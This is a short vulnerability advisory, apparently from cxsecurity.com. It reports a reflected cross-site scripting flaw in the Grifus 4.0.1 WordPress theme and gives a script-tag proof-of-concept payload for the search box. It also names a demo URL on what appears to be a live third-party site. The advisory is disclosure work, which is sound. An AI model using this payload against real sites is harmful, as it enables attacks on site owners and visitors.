WordPress Grifus 4.0.1 Cross Site Scripting

2017.12.22
Credit: Sajibe Kanti
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

====== Title: Grifus WordPress Themes XSS Vuln Version: 4.0.1 Homepage: https://mundothemes.com/grifus/ ======= Description ================ Grifus WordPress theme For movies Web POC: ======== 1. Go To Terget Web 2. Click Search box 3. Now Give This Payload in Search box " <script>prompt(document.domain)</script> " 4. Now See xss Will be Exclude Demo: ====== http://download.lakshmipuronline.com/?s=%3Cscript%3Eprompt%28document. domain%29%3C%2Fscript%3E Mitigations ================ Update Your Themes -- Thanks Sajibe Kanti Independent Web Security Researcher <https://twitter.com/Sajibekantibd>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top